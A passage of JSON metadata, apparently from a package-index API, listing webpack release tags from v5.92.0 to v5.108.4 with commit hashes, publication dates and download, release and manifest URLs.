webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosy